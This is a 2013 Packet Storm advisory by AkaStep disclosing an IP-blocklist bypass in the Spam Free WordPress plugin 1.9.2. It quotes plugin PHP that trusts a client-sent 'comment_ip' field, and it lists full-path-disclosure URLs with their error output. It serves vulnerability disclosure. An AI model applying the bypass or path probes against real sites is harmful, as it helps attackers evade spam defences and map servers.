WordPress Spam Free 1.9.2 Filter Bypass

2013-01-05T00:00:00
ID PACKETSTORM:119274
Type packetstorm
Reporter Akastep
Modified 2013-01-05T00:00:00

Description

                                        
                                            `1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm AkaStep member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
=======================================================  
Vulnerable software: Spam Free Wordpress plugin Version 1.9.2  
Download link: http://wordpress.org/extend/plugins/spam-free-wordpress/  
Vuln: IP based Blocklist restriction Bypass.  
=======================================================  
Tested On: Debian squeeze 6.0.6  
Server version: Apache/2.2.16 (Debian)  
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)  
Copyright (c) 1997-2009 The PHP Group  
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies  
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH  
=======================================================  
About vuln:  
This plugin "trusts" to client side.  
Due this issuse this is possible to bypass IP blocklist.(if used)  
  
/spam-free-wordpress/includes/functions.php  
==================SNIP========================  
// Function for wp-comments-post.php file located in the root Wordpress directory. The same directory as the wp-config.php file.  
function sfw_comment_post_authentication() {  
global $post, $sfw_options;  
  
//$sfw_comment_script = get_post_meta( $post->ID, 'sfw_comment_form_password', true );  
$sfw_comment_script = get_transient( $post->ID. '-' .$_POST['pwdfield'] );  
  
$cip = $_POST['comment_ip'];  
  
// If the reader is logged in don't require password for wp-comments-post.php  
if( !is_user_logged_in() ) {  
// Nonce check  
if( empty( $_POST['sfw_comment_nonce'] ) || !wp_verify_nonce( $_POST['sfw_comment_nonce'],'sfw_nonce' ) )  
wp_die( __( 'Spam Free Wordpress rejected your comment because you failed a critical security check.', 'spam-free-wordpress' ) . sfw_spam_counter(), 'Spam Free Wordpress rejected your comment', array( 'response' => 200, 'back_link' => true ) );  
  
// Compares current comment form password with current password for post  
if( empty( $_POST['pwdfield'] ) || $_POST['pwdfield'] != $sfw_comment_script )  
wp_die( __( 'Spam Free Wordpress rejected your comment because you did not enter the correct password or it was empty.', 'spam-free-wordpress' ) . sfw_spam_counter(), 'Spam Free Wordpress rejected your comment', array( 'response' => 200, 'back_link' => true ) );  
  
// Compares commenter IP address to local blocklist  
if( empty( $_POST['comment_ip'] ) || $_POST['comment_ip'] == sfw_local_blocklist_check( $cip ) )  
wp_die( __( 'Comment blocked by Spam Free Wordpress because your IP address is in the local blocklist, or you forgot to type a comment.', 'spam-free-wordpress' ) . sfw_spam_counter(), 'Spam Blocked by Spam Free Wordpress local blocklist', array( 'response' => 200, 'back_link' => true ) );  
  
}  
  
===============EOF SNIP=========================  
  
Proof of concept video about this vulnerability can be found here:   
  
  
http://www.youtube.com/watch?v=vbUzJS0EdFA&feature=youtu.be  
  
  
  
  
  
FULL PATH DISCLOSURES:  
Direct access:  
  
http://hacker1.own/wp/wp-content/plugins/spam-free-wordpress//comments.php  
  
Fatal error: Call to a member function sfw_comment_form_header() on a non-object in /etc/apache2/htdocs/hacker1/wp/wp-content/plugins/spam-free-wordpress/comments.php on line 8   
  
http://hacker1.own/wp/wp-content/plugins/spam-free-wordpress//admin/class-menu.php  
  
Fatal error: Call to undefined function add_action() in /etc/apache2/htdocs/hacker1/wp/wp-content/plugins/spam-free-wordpress/admin/class-menu.php on line 9   
  
http://hacker1.own/wp/wp-content/plugins/spam-free-wordpress//tl-spam-free-wordpress.php  
  
Fatal error: Call to undefined function __() in /etc/apache2/htdocs/hacker1/wp/wp-content/plugins/spam-free-wordpress/tl-spam-free-wordpress.php on line 24   
  
http://hacker1.own/wp/wp-content/plugins/spam-free-wordpress//includes/functions.php  
  
Fatal error: Call to undefined function add_filter() in /etc/apache2/htdocs/hacker1/wp/wp-content/plugins/spam-free-wordpress/includes/functions.php on line 269   
  
  
Theris also XSS vulnerability when inserting API key(License key).  
But in fact it isn't exploitable due usage of "wp_nonce" ANTI-CSRF token.  
  
  
================================================  
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
osvdb.com  
websecurity.com.ua  
1337day.com  
  
to all Aa Team + to all Azerbaijan Black HatZ  
+ *Especially to my bro CAMOUFL4G3 *  
To All Turkish Hackers  
  
Also special thanks to: ottoman38 & HERO_AZE  
================================================  
  
/AkaStep  
  
`